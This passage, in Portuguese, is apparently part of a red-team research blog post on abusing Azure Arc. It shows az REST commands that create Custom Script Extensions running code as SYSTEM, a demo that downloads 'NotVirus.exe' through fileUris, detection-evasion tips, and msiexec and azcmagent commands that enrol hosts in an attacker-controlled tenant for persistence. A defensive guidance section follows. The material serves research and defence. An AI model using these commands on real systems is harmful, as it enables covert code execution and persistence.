Vários argumentos são necessários ao criar um CSE, e o mais importante deles é o ProtectSettings arg, pois ele contém um atributo commandToExecute opcional. Aproximadamente, esse atributo é onde os argumentos de execução de comando são colocados. Um exemplo de comando da CLI de z que pode ser executado na API de REST para criar um CSE que inicia o Bloco de Notas pode ser visto abaixo:

az rest --method put --uri
"https://management.azure.com/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[arbitrary CSE name]?api-version=2025-02-19-preview" --body "{\"location\":\"[resource location]\",\"properties\":{\"publisher\":\"Microsoft.Compute\",\"type\":\"CustomScriptExtension\",\"typeHandlerVersion\":\"1.10\",\"autoUpgradeMinorVersion\":true,\"settings\":{},\"protectedSettings\":{\"commandToExecute\":\"[Thing to run.exe]\"}}}"

Execução mais uma vez resulta em uma execução no contexto de NT_AUTHORITY\SYSTEM.

Árvore de processos associada à execução via CSE
Fig 48: Árvore de processos associada à execução via CSE

Depois que um CSE tiver sido criado, você também poderá verificar seu status atual por meio da API REST, usando um comando formatado da seguinte forma:

az rest --method get --uri
"https://management.azure.com/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[CSE name from prior step]?api-version=2025-02-19-preview"

Ao fazer isso, podemos ver que a implementação do CSE permanece em estado de execução até que o processo lançado seja encerrado no sistema do cliente.

Status da extensão do cliente em arquivo quando um CSE está sendo executado
Fig 49: Status da extensão do cliente em arquivo quando um CSE está sendo executado

É importante ter esse comportamento em mente, pois as extensões não podem ser interrompidas à força, mesmo tentando excluir o CSE. Isso significa que, se você iniciar um CSE que gere um processo de execução longa que não concede acesso ao sistema e você não tiver outro mecanismo (como comandos de execução) que permita encerrar o processo, você poderá ficar fora de outras execuções de CSE até que o sistema seja reiniciado. Além disso, se você estiver usando um CSE como mecanismo para implementar um beacon C2, é recomendável migrar do processo de origem para que você possa limpar o objeto CSE.

Continuando, digamos que queremos fazer algo um pouco mais avançado com nossa execução CSE do que apenas executar o Bloco de Notas. Existem várias opções para atualizar nosso CSE atual, e podemos atualizar no local ou remover a extensão do CSE e reimplantar. A atualização no local é mais simples, mas depende de que a execução anterior do CSE esteja em alguma forma de estado concluído (por exemplo, bem-sucedido, com falha) antes da execução. Para atualizar um CSE já existente, você pode simplesmente modificar e reenviar o comando original que você passou para a API de REST para criá-lo, alterando o valor do atributo commandToExecute para qualquer que seja o seu comando atualizado. Isso traz o benefício adicional de manter a estrutura de pastas do CSE no sistema do cliente entre as execuções.

Descobri que, em alguns casos, o CSE pode ficar travado em um estado de Creating, mesmo quando o processo executado não está mais em execução no sistema do cliente. A melhor maneira que encontrei de identificar esse estado é verificar a lista de extensões no host afetado, o que previsivelmente mostrará o host em um provisioningState de Creating, mas se um processo ainda estiver sendo executado pelo host, você também veja uma mensagem de status mostrando que a execução está ocorrendo.

Tentativa de atualizar um CSE ainda no estado Creating
Fig 50: Tentativa de atualizar um CSE ainda no estado Creating
CSE em um estado Creating com o processo subjacente ainda em execução, conforme observado pela mensagem de status da instância
Fig 51: CSE em um estado Creating com o processo subjacente ainda em execução, conforme observado pela mensagem de status da instância
CSE em um estado Creating sem processo subjacente em execução. Observe o status de InstantView vazio
Fig 52: CSE em um estado Creating sem processo subjacente em execução. Observe o status de InstantView vazio

Se você encontrar seu CSE neste estado "Criando, mas não em execução", a melhor abordagem é excluí-lo completamente (se tiver certeza de que o processo executado com ele não está mais em execução), o que pode ser feito com o seguinte comando:

az resource delete --ids "/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[CSE Name]"

A tentativa de excluir um CSE quando o executável subjacente ainda está em execução (por exemplo, um beacon https funcionando como NT_AUTHORITY\SYSTEM que não pode sair devido a controles de proxy) não fará com que o processo seja encerrado, nem fará com que o CSE se exclua . Em vez disso, isso pode resultar na extensão do CSE ficando presa em um estado Deleting indefinidamente, com a única remediação completa que identifiquei sendo excluir o objeto pai da identidade híbrida do Azure, desinstalar o cliente Arc do sistema gerenciado e reinstalar tudo. Pode parecer assustador, mas depois que percebi isso, foi como um processo de cinco minutos para colocar tudo em funcionamento novamente.

Outra coisa para ter em mente sobre a exclusão de CSEs: o processo de exclusão remove a pasta C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension do disco do sistema do cliente, apagando todos os arquivos que você possa ter carregado ou modificado nessa estrutura. Além disso, leva de três a cinco minutos para processar o comando de exclusão do CSE no Azure; Isso é normal.

Uma das coisas interessantes que um CSE pode fazer, além de executar comandos, é baixar arquivos da Internet. Uma variedade de arquivos pode ser especificada sob o argumento de configurações no atributo fileUris, que permite o download de arquivos para a pasta C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\[version]\Downloads\[iterator] . Essa estrutura de pastas persiste até que o CSE seja excluído do Azure, quando então tudo relacionado à extensão CSE é excluído do disco. Isso significa que você poderia criar um script que copiasse arquivos para fora dessa pasta para outro lugar no disco, permitindo um mecanismo para contrabando de arquivos que não depende de uma base tradicional de download na web. Como esses arquivos persistem depois de serem migrados para fora do diretório padrão, eles podem ser copiados e, em seguida, executados com um CSE subsequente de outro lugar no disco, interrompendo uma detecção estática que depende da identificação de execuções da pasta de downloads de CSEs anotada anteriormente.

Ao criar uma lógica mais avançada como essa, que pode ou não ser bem-sucedida, também é útil poder recuperar a saída que indica se uma execução foi bem-sucedida ou não. Embora não seja possível recuperar diretamente a saída das execuções CSE, os códigos de saída são retornados, o que significa que podemos incluir desvio condicional em nosso código que sai com um código específico com base no estado atual do programa (por exemplo, cópia de arquivo com sucesso) . Juntando essas peças, vamos realizar uma demonstração super planejada que faz o seguinte:

  • Faz download de dois arquivos por meio do parâmetro fileUris de um servidor web intitulado notVirus.exe e alsoNotVirus.txt. Neste caso, usarei um servidor web local com um nome de host de legitServer. Como isso será tratado via fileUris, não precisamos codificar isso explicitamente em nosso script do PowerShell.
  • O script do PowerShell deve copiar os arquivos baixados para C:\Windows\Temp
  • Finalmente, o script sai com um código de saída de 10 em caso de download + cópia bem-sucedidos e um código de 20 em caso de falha

Um script simples do PowerShell que realiza essas coisas seria algo como:

try
{
    Copy-Item -Path "NotVirus.exe" -Destination "C:\Windows\Temp\NotVirus.exe" -Force -
ErrorAction Stop
    Copy-Item -Path "AlsoNotVirus.txt" -Destination "C:\Windows\Temp\AlsoNotVirus.txt" -
Force -ErrorAction Stop
if ((Test-Path "C:\Windows\Temp\NotVirus.exe") -and (Test-Path
"C:\Windows\Temp\AlsoNotVirus.txt"))
    {
        exit 10
    }
    else
    {
        exit 20
    }
}
catch
{
    exit 20
}

Ao formatar com todos os sistemas de fuga necessários para permitir que o script seja transmitido em um blob JSON por meio da API az REST, obtemos um comando semelhante ao seguinte:

az rest --method put --uri
"https://management.azure.com/subscriptions/[subscription]/resourceGroups/[resource group]/providers/Microsoft.HybridCompute/machines/[computer name]/extensions/[arbitrary CSE name]?api-version=2025-02-19-preview" --body "{\"location\":\"[resource location]\",\"properties\":{\"publisher\":\"Microsoft.Compute\",\"type\":\"CustomScriptExtension\",\"typeHandlerVersion\":\"1.10\",\"autoUpgradeMinorVersion\":true,\"settings\":{\"fileUris\":[\"http://legitServer/NotVirus.exe\",\"http://legitServer/AlsoNotVirus.txt\"]},\"protectedSettings\":{\"commandToExecute\":\"powershell.exe -ExecutionPolicy Bypass -Command \\\"try { Copy-Item -Path NotVirus.exe -Destination C:\\\\Windows\\\\Temp\\\\NotVirus.exe -Force -ErrorAction Stop; Copy-Item -Path AlsoNotVirus.txt -Destination C:\\\\Windows\\\\Temp\\\\AlsoNotVirus.txt -Force -ErrorAction Stop; if ((Test-Path 'C:\\\\Windows\\\\Temp\\\\NotVirus.exe') -and (Test-Path 'C:\\\\Windows\\\\Temp\\\\AlsoNotVirus.txt')) { exit 10 } else { exit 20 } } catch { exit 20 }\\\"\"}}}"

Executamos o comando acima e, depois de esperar um minuto para a conclusão da execução, podemos verificar o status com o comando az connectedmachine extension list. Executar isso mostra que recebemos um código de saída 10 de volta, indicando uma execução bem-sucedida. A mensagem de erro é uma mensagem genérica que indica um código de retorno diferente de zero, que não nos diz respeito.

Informações de extensão mostrando CSE encerrado com código de status 10, indicando execução bem-sucedida do script
Fig 53: Informações de extensão mostrando CSE encerrado com um código de status de 10, indicando execução bem-sucedida do nosso script

Verificando o sistema remoto, também podemos verificar se os arquivos foram copiados com sucesso.

Arquivos copiados para C:\Windows\Temp pelo CSE
Fig 54: Arquivos copiados para C:\Windows\Temp pelo CSE

Como podemos ver, esse código começa a ficar complicado rapidamente. Para simplificar ainda mais as coisas, também seria possível baixar um script do PowerShell adicionando-o à matriz fileUris e, em seguida, chamando-o a partir do atributo commandToExecute.

Antes de migrarmos, deixe-me compartilhar uma última ideia sobre como você pode aumentar a furtividade dessa técnica alterando sua impressão digital de execução. Se você se lembra do lançamento inicial do nosso processo via CSE, o cmd.exe aparecia na parte superior da árvore de execução, sem um processo principal visível.

Árvore de processo de execução do CSE
Fig 55: Árvore do processo de execução do CSE

Dar uma olhada neste processo de cmd.exe mais alto mostra uma ID de Processo pai (PID) inexistente de 5068.

PID misteriosa de 5068
Fig. 56: PID misteriosa do 5068

Podemos nos aprofundar um pouco mais com o Process Monitor, mostrando que nossa desconhecida ID de Processo Principal (PPID) de 5068 era outra instância de cmd.exe, que criou nossa árvore de processos atual por meio de uma chamada de cmd /c. Esse processo de cmd oculto foi gerado pelo gc_extension_service.exe na PID 3588 por meio da execução do script enable.cmd.

Saída do ProcMon mostrando uma árvore de execução mais completa quando um CSE é executado
Fig 57: Saída do ProcMon mostrando uma árvore de execução mais completa quando um CSE é executado
Script Enable.cmd contendo um script cmd que chama CustomScriptHandler.exe
Fig 58: Script Enable.cmd contendo um script cmd que chama CustomScriptHandler.exe

Por que tudo isso importa? Bem, atualmente, temos uma árvore de execução bastante estática de gc_extension_service -> cmd.exe -> cmd.exe -> CustomScriptHandler.exe -> cmd.exe -> [tudo o que executarmos via CSE]. Se pudéssemos nos inserir no topo dessa cadeia, poderíamos ignorar as detecções focando em execuções suspeitas que vêm dessa conhecida estrutura de árvore de processos. Como este arquivo .cmd é apenas um script não assinado sendo executado por NT_AUTHORITY\SYSTEM fora de um local conhecido como resultado de um evento que controlamos (criando ou modificando um CSE), seria possível modificar esse script para redirecionar o fluxo de execução padrão para chamar um processo de nossa escolha. Supondo que nosso único vetor de execução no host seja por meio do Arc, isso apresenta um problema um pouco mais complicado, pois precisaríamos executar através de uma árvore de processos conhecida para modificar esse arquivo. No entanto, realizar modificações de texto em um arquivo não assinado tem um perfil de detectabilidade muito menor quando comparado a outras ações típicas pós-invasão. Não entrarei em mais detalhes sobre essa modificação (ou outras modificações semelhantes que poderiam ser feitas em outras extensões), mas apenas uma ideia de algo legal que você poderia fazer.

Resultados da modificação da árvore de execução do processo para interromper o fluxo de processo esperado
Fig 59: Resultados da modificação da árvore de execução do processo para interromper o fluxo de processo esperado

Windows Admin Center (e outras extensões)

Até este ponto, nós nos concentramos em ataques possíveis usando a API REST não interativa do ponto de vista de uma Entidade de Serviço superprovisionada configurada com a função de Administrador de Recursos de Máquina Conectada do Azure. No entanto, se tivermos uma conta que tenha acesso à interface gráfica do usuário (GUI) da web, o escopo do que pode ser feito aumenta substancialmente. Há uma variedade de extensões que podem ser enviadas para clientes gerenciados e abrir novos caminhos de execução de código, mas quando eu estava bisbilhotando o Arc, um que acabou sendo do meu interesse foi o Windows Admin Center (WAC). O Arc pode implementar o componente de gerenciamento de back-end do Windows Admin Center, uma ferramenta autônoma de gerenciamento remoto lançada pela Microsoft, por meio de uma extensão do Arc. Não é possível interagir diretamente com esta extensão por meio da API REST do Azure, que eu saiba, mas uma variedade de opções de gerenciamento de sistemas são expostas por meio da GUI, uma vez implementadas em um cliente.

Após a extensão WAC (lol) ter sido instalada em um sistema gerenciado pelo Arc, ela pode ser acessada diretamente através do portal do Arc, navegando até o dispositivo gerenciado, supondo que você tenha a função apropriada atribuída (ou possa atribuí-la a você mesmo).

O WAC requer a função de login de Administrador do Windows Admin Center para se conectar
Fig 60: O WAC requer a função de login de Administrador do Windows Admin Center para se conectar

Com o acesso apropriado configurado, você pode se conectar à interface de gerenciamento e executar o código por meio de uma variedade de mecanismos diferentes, incluindo criação de processos, criação/modificação de tarefas agendadas, modificação de serviço e modificação de registro. Evitarei entrar nos detalhes específicos de cada um deles, mas discutirei rapidamente a criação de processos como um exemplo que demonstra algumas das peculiaridades da execução por meio do WAC.

A criação de processos é provavelmente a maneira mais direta de executar código via WAC: basta inserir um processo para iniciar (com argumentos opcionais) e clicar em Iniciar.

Iniciando o bloco de notas via WAC
Fig 61: Iniciando o bloco de notas via WAC
Árvore de processos resultante da execução direta de processos no WAC
Fig 62: Árvore de processos resultante da execução direta de processos no WAC

Curiosamente, isso é executado no contexto de uma conta virtual (WAC_[seu nome de usuário do azure]), mas em um contexto de alta integridade com privilégios completos de token, como pode ser visto ao enviar um whoami /priv para um arquivo de texto no disco.

Privilégios de token atribuídos ao executar comandos por meio do WAC
Fig 63: Privilégios de token atribuídos ao executar comandos por meio do WAC

O processo em si é gerado como filho do WmiPrvSe.exe, uma árvore de processos familiar para aqueles familiarizados com o movimento lateral via Process.Create. Quando um comando é executado dessa forma, a conta virtual tem uma pasta de usuário criada para ela no disco, deixando para trás ainda mais IOCs que devem ser limpos. No entanto, com certeza é fácil de usar!

Além desses vetores de execução de código, há vários outros recursos de gerenciamento, como navegação por arquivos gráficos e compartilhamento de arquivos, um recurso essencial para o seu próprio C2 de nível empresarial.

captura de tela de vetores de execução de código para Windows > System32
Fig. 64

O WAC também possui um painel de controle de VM, que permite a instalação do Hyper-V no sistema gerenciado e, posteriormente, a implementação e o gerenciamento de VMs.

Configuração do Hyper-V via WAC
Figura 65: Configuração do Hyper-V via WAC
Implementação e gerenciamento de VM no WAC
Fig 66: Implementação e gerenciamento de VM no WAC

A princípio, essa funcionalidade parecia muito promissora, mas tive problemas ao tentar descobrir como implementar um arquivo ISO no host. O navegador de arquivos dentro do WAC tem funcionalidade de upload integrada, mas infelizmente tem um limite bastante baixo no tamanho do upload. Isso significava que um mecanismo de fallback precisaria ser implementado para obter um ISO adequado no sistema para criar uma VM. Foram encontrados problemas subsequentes que provavelmente também se apresentariam em um ambiente corporativo em relação à virtualização aninhada. Como muitos sistemas em um ambiente empresarial são normalmente virtualizados, o Intel VT-x /AMD-V precisaria estar habilitado no sistema para permitir a virtualização aninhada.

Finalmente, com todas essas funcionalidades disponíveis, não há falta de ataques interessantes que você pode executar via substituição de arquivos ou modificação para sequestrar o que o Arc / WAC está fazendo em segundo plano para mascarar ainda mais quaisquer ações pós-invasão. Lembre-se, esta é apenas uma das muitas extensões disponíveis para deploy em clientes gerenciados pelo Arc; sem dúvida existem vetores de execução de código semelhantes em outros que podem oferecer funcionalidade adicional.

Observe que o WAC realiza suas próprias instalações independentes e, portanto, expande significativamente a pegada de carbono e os requisitos de limpeza associados a um comprometimento. Além disso, as ações executadas no contexto de uma conta WAC_ resultarão em ações adicionais no disco, como a criação de uma pasta de usuário, embora nenhum perfil de usuário local seja gerado para a conta. Dito isso, embora sirva como um recurso legal que abre vários vetores de execução de código, talvez seja algo que eu ignore em servidores de missão crítica.

Bônus: Sem privilégios de administrador

Digamos que você recuperou um segredo principal do serviço, mas ele foi devidamente provisionado para permitir apenas a integração de sistemas. Ainda pode valer a pena tentar integrar um sistema que você controla para ver se alguma instalação ou configuração automatizada contendo material credencial adicional é enviada para seu sistema.

Azure Arc como mecanismo de persistência

Este é um tópico que eu não tinha visto muito mencionado até o recente blog de Andy Gill sobre o uso do Arc como um mecanismo de C2. O Arc é excelente, pois é um produto legítimo da Microsoft e se comunica diretamente com endpoints de API conhecidos no Azure, o que significa que normalmente é negligenciado pelos produtos de detecção e resposta de endpoint (EDR). Embora eu não esteja recomendando a tentativa de operar por meio do Arc, ele serve como um mecanismo interessante fora de banda para persistência de fallback em um ambiente. Mesmo que um host tenha ingressado de forma híbrida em um ambiente Entra, não há requisito de que ele se conecte a uma instância Arc hospedada no mesmo locatário. O que isso significa é que, se você tiver um contexto de alta integridade em um host que ainda não seja gerenciado via Arc, poderá implementar seu próprio cliente Arc e gerenciá-lo por meio do seu próprio locatário do Azure.

Como o blog do Andy detalha muito o uso geral do Arc para persistência, só adicionarei um pequeno ponto sobre a operacionalização quando o acesso baseado em GUI não for possível (como o que seria típico ao operar por meio de um agente C2). Analisando os scripts de implementação, o processo de instalação do cliente Arc consiste amplamente em duas partes: a instalação do cliente real por meio de um instalador MSI e a conexão do cliente instalado a um locatário do Azure por meio de args de linha de comando passados para o Arc Connected Machine Agent (C:\Program Files\AzureConnectedMachineAgent\azcmagent.exe). Ambos os passos neste processo podem ser concluídos localmente ou remotamente (usando sua Avenue preferida de execução de código de movimento lateral) a partir de um contexto de linha de comando não interativo, usando a sintaxe aproximada de:

1.

msiexec /i C:\path\to\AzureConnectedMachineAgent.msi /l*v C:\path\to\write\installationlog.txt /qn REBOOT=ReallySuppress

2.

"C:\Program Files\AzureConnectedMachineAgent\azcmagent.exe" connect --service-principal-id "[Service Principal Application ID]" --service-principal-secret "[Your SP Secret]" --resource-group "[resource group]" --tenant-id "[your tenant ID]" --location "[Azure region you want client to be associated with]" --subscription-id "[your subscription]" --cloud "AzureCloud" --correlation-id "[pretty sure random GUID, can just grab from an actual script deployment]"

Depois de conectado, o sistema será exibido na lâmina Arc em seu locatário do Azure, e você poderá usar a CLI do az, a API de REST do az ou a GUI para executar ações nele. Agora que o cliente Arc está conectado a um locatário sobre o qual você tem controle total, há também uma gama mais ampla de opções disponíveis para execução subsequente de código que se estendem além do escopo do que foi abordado neste blog.

Um ponto adicional sobre a implementação do Arc: infelizmente, você não pode conectar "por cima" de outra configuração do Arc sem primeiro desconectar a conexão existente do Arc — uma operação que requer a função de Administrador de Recursos de máquina conectada do Azure. Você provavelmente poderia contornar isso desinstalando completamente e reinstalando o cliente Arc, mas essa não seria minha primeira opção de execução ou persistência. O que isso significa é que, se um sistema já tiver o Arc instalado, você deve se concentrar em obter acesso a ele por meio da conexão existente, em vez de tentar estabelecer uma conexão com seu próprio locatário nele.

Orientação defensiva

Controles preventivos

  • Garantir que as entidades de serviço tenham seu acesso adequadamente restrito para atribuir a elas somente as funções explicitamente necessárias; basicamente, não concede ao diretor de serviço de implementação o papel de administrador de recursos de máquina conectada ao Azure
  • Por padrão, o Arc atribui permissões no nível do grupo de recursos, mas as atribuições de funções privilegiadas que afetam o Arc também podem ser feitas nos níveis de assinatura upstream e grupo de gerenciamento (se habilitado no seu locatário). Realize avaliações periódicas de acesso para garantir que as atribuições de funções com a capacidade de executar código via Arc (conforme observado na seção Obtendo acesso ao Arc acima) sejam apropriadas. Um exemplo desse acesso em dois Service Principals pode ser visto abaixo:

 

Service Principals de serviço com a função de administrador de recursos de máquinas conectadas ao Azure atribuídas no Azure
Fig 67: Service Principals com a função de Administrador de recursos de máquinas conectadas ao Azure atribuídas no Azure
  • Restrinja o acesso aos scripts de implementação o máximo possível em ambientes locais. Por exemplo, se a implementação for feita via GPO, o acesso ao compartilhamento de implementação deve ser restrito não a todos os computadores do domínio, mas a um grupo de sistemas cujos membros serão registrados no Arc.
  • Listas de permissões e listas de bloqueio de extensão podem ser implementadas localmente em sistemas gerenciados pelo Arc diretamente por meio do executável local do azcmagent. Elas podem ser configuradas para não permitir extensões não utilizadas (como o comando de execução ou CSEs) e, devido à sua natureza local, significam que, nem mesmo um Administrador Global no Azure poderia modificá-las diretamente. As orientações oficiais da Microsoft a respeito podem ser encontradas aqui.
  • Podem ser implementadas Políticas do Azure que restringem quais extensões podem ser instaladas em sistemas gerenciados pelo Arc. Isso é funcionalmente semelhante a uma lista de bloqueio implementada localmente por meio da configuração do azcmegent, mas é implementada a partir do Azure. A principal desvantagem dessa abordagem é que um invasor suficientemente privilegiado no Azure poderia excluir ou modificar as políticas aplicáveis de forma viável, permitindo que elas executem posteriormente o código em sistemas gerenciados pelo Arc.

Controles de detecção (monitoramento)

  • Configurações específicas de monitoramento de arquivos e árvores de processos podem ser menos eficazes na identificação de execuções suspeitas via Arc se os comandos de execução ou CSEs estiverem regularmente em uso em uma empresa. No entanto, se não forem, regras específicas podem ser escritas para identificar melhor a pós-invasão via Arc. Os dois blogs a seguir têm uma grande quantidade de detalhes técnicos na identificação de instalações e execuções do Arc com base em indicadores no disco e estruturas de árvore de processo:
            -  https://www.nsideattacklogic.de/azure-arc-part-2-escalation-from-cloud-to-on-premises/
            -  https://blog.zsec.uk/azure-arc-c2aas/
  • O monitoramento de assinatura no Azure rastreará todas as execuções por meio de comando de execução ou extensão nos itens de log RunCommand e instalação ou atualização de um log de extensão do Azure Arc, respectivamente. Observe que Instalar ou atualizar uma extensão do Azure Arc pode mostrar o status Com falha, pois muitas vezes o processo executado retorna um código de erro diferente de zero. Embora esses logs não mostrem a execução exata do comando ou o blob do CSE transmitido, eles mostram a hora e o usuário que realizou a operação.
  • As funções que podem ser usadas para executar comandos em sistemas gerenciados por meio do Arc devem ser tratadas como confidenciais e ter as alterações de associação monitoradas. As modificações de função no Azure RBAC são registradas no log de atividades do Azure nas entradas de log Create role assignment.
  • A estrutura do script de implementação do Arc é bastante estática em todos os canais de implementação oficialmente suportados. Se houver ferramentas em um ambiente que ofereçam suporte à verificação de conteúdo de arquivos, uma assinatura básica para esse script poderá ser implementada para identificar todas as instâncias de scripts de implementação. Uma abordagem semelhante, embora um pouco menos eficaz, seria, em vez disso, pesquisar arquivos para o nome do script de implementação padrão de OnboardingScript.ps1.
  • C:\ProgramData\AzureConnectedMachineAgent\Config\agentconfig.json inclui a ID do locatário ao qual o Arc está atualmente conectado. Implementações não autorizadas do Arc podem ser identificadas por referência cruzada desse valor em todos os sistemas com Arc instalado em relação ao ID do locatário da empresa.
  • O Azure Arc compartilha muitas características com outras ferramentas de monitoramento remoto e gerenciamento (RMM). Tratar uma instalação inesperada do Arc em um sistema como um evento alertável pode ajudar a identificar uma implementação não autorizada sendo usada para o C2 secreto.

Pesquisa anterior sobre o Azure Arc

Observação: esta lista não pretende conter uma lista exaustiva de todas as pesquisas relacionadas ao uso ofensivo do Arc; na verdade, ele contém uma lista de artigos e palestras que me ajudaram a entender a plataforma, bem como os vetores de ataque disponíveis por meio dela.

  • Andy Gill – "LOLCLOUD - Azure Arc - C2aaS": https://blog.zsec.uk/azure-arc-c2aas/
  • Benedikt Strobl – NSIDE Attack Logic – "Azure Arc – Part 1 – Escalation from On-Premises to Cloud": https://www.nsideattacklogic.de/azure-arc-part-1-escalation-from-on-premises-to-cloud/
  • Benedikt Strobl – NSIDE Attack Logic – "Azure Arc – Part 2 – Escalation from Cloud to On-Premises": https://www.nsideattacklogic.de/azure-arc-part-2-escalation-from-cloud-to-on-premises/
  • Christian Bortone – "Abusing Azure Arc: From Service Principal Exposed To Reverse Shell" (Conference talk): https://www.youtube.com/watch?v=KtRYn5GA4iU
  • CloudBreach – "Abusing Azure Arc for lateral movement": https://cloudbreach.io/blog/abusing-azure-arc-for-lateral-movement/
  • Karl Fosaaen – NetSPI – "Abusing Azure Hybrid Workers for Privilege Escalation – Part 1": https://www.netspi.com/blog/technical-blog/cloud-pentesting/abusing-azure-hybrid-workers-for-privilege-escalation/
  • Renos Nikolaou – "Abusing Azure Arc for lateral movement": https://medium.com/@r3n_hat/abusing-azure-arc-for-lateral-movement-39a1b56cbf2b
  • Ryan Hausknecht – "Azure Virtual Machine Execution Techniques": https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/
  • Soroganoth – "Azure VM Security: Part 1: Moving from management plane to data plane and the Run Command": https://soroganoth.com/post/research/azure_vm_security/
